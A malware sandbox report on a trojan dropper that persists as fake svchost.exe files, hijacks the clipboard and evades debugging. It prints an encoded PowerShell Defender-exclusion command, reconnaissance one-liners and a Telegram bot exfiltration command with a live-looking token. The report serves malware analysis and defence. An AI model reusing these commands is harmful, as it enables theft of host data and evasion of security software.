        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00405390 GetTickCount,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalSize,CloseClipboard,GlobalLock,GlobalUnlock,_memset,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GetTickCount,GlobalFree,CloseClipboard,7_2_00405390
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00405390 GetTickCount,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalSize,CloseClipboard,GlobalLock,GlobalUnlock,_memset,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GetTickCount,GlobalFree,CloseClipboard,7_2_00405390
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00405390 GetTickCount,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalSize,CloseClipboard,GlobalLock,GlobalUnlock,_memset,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GetTickCount,GlobalFree,CloseClipboard,10_2_00405390
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00405390 GetTickCount,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalSize,CloseClipboard,GlobalLock,GlobalUnlock,_memset,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GetTickCount,GlobalFree,CloseClipboard,18_2_00405390
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00405390 GetTickCount,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalSize,CloseClipboard,GlobalLock,GlobalUnlock,_memset,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GetTickCount,GlobalFree,CloseClipboard,7_2_00405390
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00401090 GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,7_2_00401090
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00401100 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,7_2_00401100
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00401090 GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,10_2_00401090
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00401100 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,10_2_00401100
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00401180 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,10_2_00401180
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00401200 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,10_2_00401200
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00401090 GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,18_2_00401090
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00401100 GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,18_2_00401100
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AAB8F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF669AAB8F0
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CCB5801_2_04CCB580
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04CCB5701_2_04CCB570
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ACC9C43_2_00007FF669ACC9C4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ACA9C03_2_00007FF669ACA9C0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC2CD43_2_00007FF669AC2CD4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC9D243_2_00007FF669AC9D24
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB3C883_2_00007FF669AB3C88
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AA5B703_2_00007FF669AA5B70
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AAEDF83_2_00007FF669AAEDF8
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ACFFF03_2_00007FF669ACFFF0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AAE3D03_2_00007FF669AAE3D0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC16C83_2_00007FF669AC16C8
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB96B43_2_00007FF669AB96B4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB46203_2_00007FF669AB4620
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB18903_2_00007FF669AB1890
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABD7F83_2_00007FF669ABD7F8
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AE4A383_2_00007FF669AE4A38
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AA1AB43_2_00007FF669AA1AB4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC19DC3_2_00007FF669AC19DC
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ADE9D43_2_00007FF669ADE9D4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AACCE43_2_00007FF669AACCE4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC4C703_2_00007FF669AC4C70
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB4EE43_2_00007FF669AB4EE4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AA9E503_2_00007FF669AA9E50
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB0E543_2_00007FF669AB0E54
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABAE803_2_00007FF669ABAE80
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC807C3_2_00007FF669AC807C
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AE0FC03_2_00007FF669AE0FC0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AA70183_2_00007FF669AA7018
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AD7F443_2_00007FF669AD7F44
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC22D43_2_00007FF669AC22D4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AA53003_2_00007FF669AA5300
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AD81C03_2_00007FF669AD81C0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC31B43_2_00007FF669AC31B4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABB4D43_2_00007FF669ABB4D4
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AE14903_2_00007FF669AE1490
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC44343_2_00007FF669AC4434
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC86B03_2_00007FF669AC86B0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ACFFF03_2_00007FF669ACFFF0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB06883_2_00007FF669AB0688
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC25703_2_00007FF669AC2570
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AA75503_2_00007FF669AA7550
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABC5403_2_00007FF669ABC540
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AAB8F03_2_00007FF669AAB8F0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABA8683_2_00007FF669ABA868
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AAC8243_2_00007FF669AAC824
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ABE76C3_2_00007FF669ABE76C
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ADB7783_2_00007FF669ADB778
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_0040C8984_2_0040C898
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_0040E9504_2_0040E950
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004109104_2_00410910
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004109D94_2_004109D9
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004105E04_2_004105E0
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004115804_2_00411580
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004109934_2_00410993
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_004106004_2_00410600
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_0040B3474_2_0040B347
        Source: C:\Users\user\AppData\Local\Temp\tg.exeCode function: 4_2_0040F3C84_2_0040F3C8
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0040D7F07_2_0040D7F0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004068207_2_00406820
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004094F07_2_004094F0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004194967_2_00419496
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004185547_2_00418554
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0040CD207_2_0040CD20
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004179277_2_00417927
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00406DE07_2_00406DE0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00417E787_2_00417E78
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_00419ABC7_2_00419ABC
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0040CF4A7_2_0040CF4A
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_004173D67_2_004173D6
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0040682010_2_00406820
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0041792710_2_00417927
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00419ABC10_2_00419ABC
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_004173D610_2_004173D6
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_004094F010_2_004094F0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0041949610_2_00419496
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0041855410_2_00418554
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0040CD2010_2_0040CD20
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00406DE010_2_00406DE0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_00417E7810_2_00417E78
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0040CF4A10_2_0040CF4A
        Source: C:\ProgramData\svchost\svchost.exeCode function: 10_2_0040D7F010_2_0040D7F0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0040682018_2_00406820
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_004094F018_2_004094F0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0041949618_2_00419496
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0041855418_2_00418554
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0040CD2018_2_0040CD20
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0041792718_2_00417927
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00406DE018_2_00406DE0
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00417E7818_2_00417E78
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_00419ABC18_2_00419ABC
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0040CF4A18_2_0040CF4A
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_004173D618_2_004173D6
        Source: C:\ProgramData\svchost\svchost.exeCode function: 18_2_0040D7F018_2_0040D7F0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAAE18523_2_00007FFD9BAAE185
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9BAAE0FC23_2_00007FFD9BAAE0FC
        Source: C:\ProgramData\svchost\svchost.exeCode function: String function: 00412140 appears 38 times
        Source: client.exe.0.drStatic PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
        Source: client.exe.0.drStatic PE information: Number of sections : 12 > 10
        Source: setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@42/28@2/3
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AAAE3C GetLastError,FormatMessageW,LocalFree,3_2_00007FF669AAAE3C
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCode function: 7_2_0040D490 CoInitializeEx,CoCreateInstance,GetFileAttributesW,_wcsrchr,SetFileAttributesW,CoUninitialize,7_2_0040D490
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AC7EC8 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00007FF669AC7EC8
        Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\SystemJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
        Source: C:\ProgramData\svchost\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\cC0inHj
        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe"
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCommand line argument: --run7_2_0040DEB0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCommand line argument: --config7_2_0040DEB0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCommand line argument: --check7_2_0040DEB0
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeCommand line argument: --config7_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exeCommand line argument: --run10_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exeCommand line argument: --config10_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exeCommand line argument: --check10_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exeCommand line argument: --config10_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exeCommand line argument: --run18_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exeCommand line argument: --config18_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exeCommand line argument: --check18_2_0040DEB0
        Source: C:\ProgramData\svchost\svchost.exeCommand line argument: --config18_2_0040DEB0
        Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\AppData\Local\Temp\client.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: setup.exeVirustotal: Detection: 61%
        Source: setup.exeReversingLabs: Detection: 63%
        Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA="
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\tg.exe "C:\Users\user\AppData\Local\Temp\tg.exe"
        Source: C:\Users\user\AppData\Local\Temp\tg.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeProcess created: C:\ProgramData\svchost\svchost.exe "C:\ProgramData\svchost\svchost.exe" --run
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\client.exe "C:\Users\user\AppData\Local\Temp\client.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$env:COMPUTERNAME"
        Source: unknownProcess created: C:\ProgramData\svchost\svchost.exe "C:\ProgramData\svchost\svchost.exe" --run
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Environment]::OSVersion"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA="Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\tg.exe "C:\Users\user\AppData\Local\Temp\tg.exe" Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\client.exe "C:\Users\user\AppData\Local\Temp\client.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"Jump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeProcess created: C:\ProgramData\svchost\svchost.exe "C:\ProgramData\svchost\svchost.exe" --runJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$env:COMPUTERNAME"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Environment]::OSVersion"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
        Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
